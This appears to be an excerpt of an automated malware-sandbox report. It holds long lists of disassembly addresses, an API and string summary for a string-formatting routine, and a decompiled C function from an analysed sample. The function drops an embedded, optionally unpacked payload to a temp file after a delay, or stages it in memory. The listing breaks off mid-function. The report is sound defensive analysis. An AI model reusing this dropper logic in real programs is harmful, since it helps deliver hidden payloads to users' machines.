                                                                                                                                                                                                                                                                                          0x000f5a11
                                                                                                                                                                                                                                                                                          0x000f5a13
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a18
                                                                                                                                                                                                                                                                                          0x000f5a1a
                                                                                                                                                                                                                                                                                          0x000f5a1c
                                                                                                                                                                                                                                                                                          0x000f5a1e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a1e
                                                                                                                                                                                                                                                                                          0x000f5a05
                                                                                                                                                                                                                                                                                          0x000f59df
                                                                                                                                                                                                                                                                                          0x000f59e2
                                                                                                                                                                                                                                                                                          0x000f59e5
                                                                                                                                                                                                                                                                                          0x000f59eb
                                                                                                                                                                                                                                                                                          0x000f59f0
                                                                                                                                                                                                                                                                                          0x000f59f0
                                                                                                                                                                                                                                                                                          0x000f59dd
                                                                                                                                                                                                                                                                                          0x000f5a20
                                                                                                                                                                                                                                                                                          0x000f5a20
                                                                                                                                                                                                                                                                                          0x000f5a22
                                                                                                                                                                                                                                                                                          0x000f5a26
                                                                                                                                                                                                                                                                                          0x000f5a41
                                                                                                                                                                                                                                                                                          0x000f5a44
                                                                                                                                                                                                                                                                                          0x000f5a47
                                                                                                                                                                                                                                                                                          0x000f5a49
                                                                                                                                                                                                                                                                                          0x000f5a50
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a63
                                                                                                                                                                                                                                                                                          0x000f5a6a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a57
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a5e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a50
                                                                                                                                                                                                                                                                                          0x000f5a34
                                                                                                                                                                                                                                                                                          0x000f5a34
                                                                                                                                                                                                                                                                                          0x000f5a37
                                                                                                                                                                                                                                                                                          0x000f5a37
                                                                                                                                                                                                                                                                                          0x000f5a6c
                                                                                                                                                                                                                                                                                          0x000f5a6f
                                                                                                                                                                                                                                                                                          0x000f5a71
                                                                                                                                                                                                                                                                                          0x000f5a76
                                                                                                                                                                                                                                                                                          0x000f5b31
                                                                                                                                                                                                                                                                                          0x000f5b36
                                                                                                                                                                                                                                                                                          0x000f5b4b
                                                                                                                                                                                                                                                                                          0x000f5b4b
                                                                                                                                                                                                                                                                                          0x000f5b50
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b52
                                                                                                                                                                                                                                                                                          0x000f5b52
                                                                                                                                                                                                                                                                                          0x000f5b55
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b55
                                                                                                                                                                                                                                                                                          0x000f5b38
                                                                                                                                                                                                                                                                                          0x000f5b38
                                                                                                                                                                                                                                                                                          0x000f5b5b
                                                                                                                                                                                                                                                                                          0x000f5b5e
                                                                                                                                                                                                                                                                                          0x000f5b61
                                                                                                                                                                                                                                                                                          0x000f5b64
                                                                                                                                                                                                                                                                                          0x000f5b67
                                                                                                                                                                                                                                                                                          0x000f5b69
                                                                                                                                                                                                                                                                                          0x000f5b70
                                                                                                                                                                                                                                                                                          0x000f5b70
                                                                                                                                                                                                                                                                                          0x000f5b73
                                                                                                                                                                                                                                                                                          0x000f5b73
                                                                                                                                                                                                                                                                                          0x000f5b76
                                                                                                                                                                                                                                                                                          0x000f5b79
                                                                                                                                                                                                                                                                                          0x000f5b79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b6b
                                                                                                                                                                                                                                                                                          0x000f5b6b
                                                                                                                                                                                                                                                                                          0x000f5b6b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b6b
                                                                                                                                                                                                                                                                                          0x000f5b3a
                                                                                                                                                                                                                                                                                          0x000f5b3a
                                                                                                                                                                                                                                                                                          0x000f5b3f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b41
                                                                                                                                                                                                                                                                                          0x000f5b41
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b41
                                                                                                                                                                                                                                                                                          0x000f5b3f
                                                                                                                                                                                                                                                                                          0x000f5b38
                                                                                                                                                                                                                                                                                          0x000f5a7c
                                                                                                                                                                                                                                                                                          0x000f5a7c
                                                                                                                                                                                                                                                                                          0x000f5af4
                                                                                                                                                                                                                                                                                          0x000f5af4
                                                                                                                                                                                                                                                                                          0x000f5af8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a7e
                                                                                                                                                                                                                                                                                          0x000f5a7e
                                                                                                                                                                                                                                                                                          0x000f5a81
                                                                                                                                                                                                                                                                                          0x000f5b20
                                                                                                                                                                                                                                                                                          0x000f5b20
                                                                                                                                                                                                                                                                                          0x000f5b25
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b27
                                                                                                                                                                                                                                                                                          0x000f5b27
                                                                                                                                                                                                                                                                                          0x000f5b2a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b2c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b2c
                                                                                                                                                                                                                                                                                          0x000f5b2a
                                                                                                                                                                                                                                                                                          0x000f5a87
                                                                                                                                                                                                                                                                                          0x000f5a87
                                                                                                                                                                                                                                                                                          0x000f5b02
                                                                                                                                                                                                                                                                                          0x000f5b05
                                                                                                                                                                                                                                                                                          0x000f5b08
                                                                                                                                                                                                                                                                                          0x000f5b0b
                                                                                                                                                                                                                                                                                          0x000f5b0e
                                                                                                                                                                                                                                                                                          0x000f5b10
                                                                                                                                                                                                                                                                                          0x000f5b18
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b12
                                                                                                                                                                                                                                                                                          0x000f5b12
                                                                                                                                                                                                                                                                                          0x000f5b12
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b12
                                                                                                                                                                                                                                                                                          0x000f5a89
                                                                                                                                                                                                                                                                                          0x000f5a8c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a8e
                                                                                                                                                                                                                                                                                          0x000f5a91
                                                                                                                                                                                                                                                                                          0x000f5ab8
                                                                                                                                                                                                                                                                                          0x000f5abb
                                                                                                                                                                                                                                                                                          0x000f5abe
                                                                                                                                                                                                                                                                                          0x000f5ac3
                                                                                                                                                                                                                                                                                          0x000f5acd
                                                                                                                                                                                                                                                                                          0x000f5acd
                                                                                                                                                                                                                                                                                          0x000f5ad0
                                                                                                                                                                                                                                                                                          0x000f5ad0
                                                                                                                                                                                                                                                                                          0x000f5ad3
                                                                                                                                                                                                                                                                                          0x000f5ad6
                                                                                                                                                                                                                                                                                          0x000f5ad6
                                                                                                                                                                                                                                                                                          0x000f5adb
                                                                                                                                                                                                                                                                                          0x000f5adb
                                                                                                                                                                                                                                                                                          0x000f5adb
                                                                                                                                                                                                                                                                                          0x000f5add
                                                                                                                                                                                                                                                                                          0x000f5adf
                                                                                                                                                                                                                                                                                          0x000f5adf
                                                                                                                                                                                                                                                                                          0x000f5ae1
                                                                                                                                                                                                                                                                                          0x000f5ae4
                                                                                                                                                                                                                                                                                          0x000f5b83
                                                                                                                                                                                                                                                                                          0x000f5b85
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5aea
                                                                                                                                                                                                                                                                                          0x000f5aea
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5aea
                                                                                                                                                                                                                                                                                          0x000f5ac5
                                                                                                                                                                                                                                                                                          0x000f5ac5
                                                                                                                                                                                                                                                                                          0x000f5ac5
                                                                                                                                                                                                                                                                                          0x000f5b8b
                                                                                                                                                                                                                                                                                          0x000f5b8b
                                                                                                                                                                                                                                                                                          0x000f5b90
                                                                                                                                                                                                                                                                                          0x000f5b92
                                                                                                                                                                                                                                                                                          0x000f5b92
                                                                                                                                                                                                                                                                                          0x000f5b94
                                                                                                                                                                                                                                                                                          0x000f5b99
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5b9f
                                                                                                                                                                                                                                                                                          0x000f5ba7
                                                                                                                                                                                                                                                                                          0x000f5ba7
                                                                                                                                                                                                                                                                                          0x000f5b99
                                                                                                                                                                                                                                                                                          0x000f5a93
                                                                                                                                                                                                                                                                                          0x000f5a93
                                                                                                                                                                                                                                                                                          0x000f5a96
                                                                                                                                                                                                                                                                                          0x000f5a96
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5a98
                                                                                                                                                                                                                                                                                          0x000f5a98
                                                                                                                                                                                                                                                                                          0x000f5a9b
                                                                                                                                                                                                                                                                                          0x000f5aa1
                                                                                                                                                                                                                                                                                          0x000f5bfa
                                                                                                                                                                                                                                                                                          0x000f5bfa
                                                                                                                                                                                                                                                                                          0x000f5aa7
                                                                                                                                                                                                                                                                                          0x000f5aa7
                                                                                                                                                                                                                                                                                          0x000f5aae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bdf
                                                                                                                                                                                                                                                                                          0x000f5be5
                                                                                                                                                                                                                                                                                          0x000f5beb
                                                                                                                                                                                                                                                                                          0x000f5bee
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bac
                                                                                                                                                                                                                                                                                          0x000f5bb2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bb4
                                                                                                                                                                                                                                                                                          0x000f5bb4
                                                                                                                                                                                                                                                                                          0x000f5bb4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bf6
                                                                                                                                                                                                                                                                                          0x000f5bf6
                                                                                                                                                                                                                                                                                          0x000f5bf6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bba
                                                                                                                                                                                                                                                                                          0x000f5bba
                                                                                                                                                                                                                                                                                          0x000f5bba
                                                                                                                                                                                                                                                                                          0x000f5bba
                                                                                                                                                                                                                                                                                          0x000f5bbe
                                                                                                                                                                                                                                                                                          0x000f5bbe
                                                                                                                                                                                                                                                                                          0x000f5bc1
                                                                                                                                                                                                                                                                                          0x000f5bc4
                                                                                                                                                                                                                                                                                          0x000f5bc9
                                                                                                                                                                                                                                                                                          0x000f5bcb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5bcd
                                                                                                                                                                                                                                                                                          0x000f5bcd
                                                                                                                                                                                                                                                                                          0x000f5bd3
                                                                                                                                                                                                                                                                                          0x000f5bd5
                                                                                                                                                                                                                                                                                          0x000f5bd5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5aae
                                                                                                                                                                                                                                                                                          0x000f5aa1
                                                                                                                                                                                                                                                                                          0x000f5a96
                                                                                                                                                                                                                                                                                          0x000f5a91
                                                                                                                                                                                                                                                                                          0x000f5a8c
                                                                                                                                                                                                                                                                                          0x000f5a87
                                                                                                                                                                                                                                                                                          0x000f5a81
                                                                                                                                                                                                                                                                                          0x000f5a7c
                                                                                                                                                                                                                                                                                          0x000f5a76
                                                                                                                                                                                                                                                                                          0x000f5952
                                                                                                                                                                                                                                                                                          0x000f5c0d
                                                                                                                                                                                                                                                                                          0x000f5c10
                                                                                                                                                                                                                                                                                          0x000f5c12
                                                                                                                                                                                                                                                                                          0x000f5c1b
                                                                                                                                                                                                                                                                                          0x000f5c1e
                                                                                                                                                                                                                                                                                          0x000f5c24
                                                                                                                                                                                                                                                                                          0x000f5c27
                                                                                                                                                                                                                                                                                          0x000f5c27
                                                                                                                                                                                                                                                                                          0x000f5c2a
                                                                                                                                                                                                                                                                                          0x000f5c31
                                                                                                                                                                                                                                                                                          0x000f5c37
                                                                                                                                                                                                                                                                                          0x000f5c39
                                                                                                                                                                                                                                                                                          0x000f5c39
                                                                                                                                                                                                                                                                                          0x000f5c44
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5c46
                                                                                                                                                                                                                                                                                          0x000f5c46
                                                                                                                                                                                                                                                                                          0x000f5c4c
                                                                                                                                                                                                                                                                                          0x000f5c54
                                                                                                                                                                                                                                                                                          0x000f5c59
                                                                                                                                                                                                                                                                                          0x000f5c5e
                                                                                                                                                                                                                                                                                          0x000f5c5e
                                                                                                                                                                                                                                                                                          0x000f5c66
                                                                                                                                                                                                                                                                                          0x000f5c6f
                                                                                                                                                                                                                                                                                          0x000f5c7c
                                                                                                                                                                                                                                                                                          0x000f5c7d
                                                                                                                                                                                                                                                                                          0x000f5c82
                                                                                                                                                                                                                                                                                          0x000f5c82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f5c6f
                                                                                                                                                                                                                                                                                          0x000f5c85
                                                                                                                                                                                                                                                                                          0x000f5c85
                                                                                                                                                                                                                                                                                          0x000f5c85
                                                                                                                                                                                                                                                                                          0x000f5c88
                                                                                                                                                                                                                                                                                          0x000f5c8c
                                                                                                                                                                                                                                                                                          0x000f5ca2
                                                                                                                                                                                                                                                                                          0x000f5ca8
                                                                                                                                                                                                                                                                                          0x000f5caa
                                                                                                                                                                                                                                                                                          0x000f5cae
                                                                                                                                                                                                                                                                                          0x000f5cae
                                                                                                                                                                                                                                                                                          0x000f5cb1
                                                                                                                                                                                                                                                                                          0x000f5cb6
                                                                                                                                                                                                                                                                                          0x000f5cbb
                                                                                                                                                                                                                                                                                          0x000f5cbe
                                                                                                                                                                                                                                                                                          0x000f5cc4
                                                                                                                                                                                                                                                                                          0x000f5cc6
                                                                                                                                                                                                                                                                                          0x000f5cca
                                                                                                                                                                                                                                                                                          0x000f5cca
                                                                                                                                                                                                                                                                                          0x000f5ccd
                                                                                                                                                                                                                                                                                          0x000f5cce
                                                                                                                                                                                                                                                                                          0x000f5cd3
                                                                                                                                                                                                                                                                                          0x000f5cd3
                                                                                                                                                                                                                                                                                          0x000f5cd6
                                                                                                                                                                                                                                                                                          0x000f5cdb
                                                                                                                                                                                                                                                                                          0x000f5cdb
                                                                                                                                                                                                                                                                                          0x000f5ce2
                                                                                                                                                                                                                                                                                          0x000f5ce7
                                                                                                                                                                                                                                                                                          0x000f5ce9
                                                                                                                                                                                                                                                                                          0x000f5ceb
                                                                                                                                                                                                                                                                                          0x000f5cf3
                                                                                                                                                                                                                                                                                          0x000f5cf5
                                                                                                                                                                                                                                                                                          0x000f5cf7
                                                                                                                                                                                                                                                                                          0x000f5cfa
                                                                                                                                                                                                                                                                                          0x000f5cff
                                                                                                                                                                                                                                                                                          0x000f5d04
                                                                                                                                                                                                                                                                                          0x000f5cf7
                                                                                                                                                                                                                                                                                          0x000f5ce9
                                                                                                                                                                                                                                                                                          0x000f5d0a
                                                                                                                                                                                                                                                                                          0x000f5d12
                                                                                                                                                                                                                                                                                          0x000f5d19
                                                                                                                                                                                                                                                                                          0x000f5d26
                                                                                                                                                                                                                                                                                          0x000f5c90
                                                                                                                                                                                                                                                                                          0x000f5c90
                                                                                                                                                                                                                                                                                          0x000f5c96
                                                                                                                                                                                                                                                                                          0x000f5c96
                                                                                                                                                                                                                                                                                          0x000f5c8c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 000F594A
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F5990
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F59C2
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F59D5
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F59EE
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F5A16
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 000F5A64
                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.), ref: 000F5BDF
                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32 ref: 000F5BE5
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 000F5C06
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 000F5C0E
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 000F5C59
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(00000001), ref: 000F5C72
                                                                                                                                                                                                                                                                                          • wvsprintfA.USER32(?,00000001,?), ref: 000F5CA2
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(-0000000C), ref: 000F5CBE
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 000F5CFF
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000F5D0A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class., xrefs: 000F5BDA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharNext$DebugDecrementInterlocked_memmove$BreakOutputStringlstrlenwvsprintf
                                                                                                                                                                                                                                                                                          • String ID: Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
                                                                                                                                                                                                                                                                                          • API String ID: 3221026881-233888011
                                                                                                                                                                                                                                                                                          • Opcode ID: ac2b568a555cbb38d32a3b4cc875351e8b8b82a98ccefd34422fc48d75e0a52d
                                                                                                                                                                                                                                                                                          • Instruction ID: 472ae8d14455307869541385697002cd91ae2db5bcb2c4b6bb8dbb27f739b31e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac2b568a555cbb38d32a3b4cc875351e8b8b82a98ccefd34422fc48d75e0a52d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFD1E471900A4D8FDB64CF28CC886BEB7E4AF49312F188565DB92D7A11E370DD91EB81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                                          				long _v608;
                                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                                          				long _v616;
                                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                                          				long _v624;
                                                                                                                                                                                                                                                                                          				intOrPtr _v628;
                                                                                                                                                                                                                                                                                          				void* _v632;
                                                                                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                                          				void* _t347;
                                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                                          				void* _t350;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          				_v32 =  *_v8;
                                                                                                                                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                                          				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                                          				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                          					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                          					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                          					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                                          					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                          					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v608 = 0;
                                                                                                                                                                                                                                                                                          						_v612 = 0;
                                                                                                                                                                                                                                                                                          						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                          							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if(_v620 != 0) {
                                                                                                                                                                                                                                                                                          								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                                          									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                                          									_v616 = _v624;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                                          							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                          							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                                          							_v628 = _t198;
                                                                                                                                                                                                                                                                                          							if(_v628 != 0) {
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                                          					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          					_v40 = _t217;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                          					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          					if(_v48 != 0) {
                                                                                                                                                                                                                                                                                          						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                                          							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                                          							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          							_v40 = _t248;
                                                                                                                                                                                                                                                                                          							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_v40 == 0) {
                                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                          						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          						_v632 = _t223;
                                                                                                                                                                                                                                                                                          						_v52 = _v632;
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if( *_v52 != 0) {
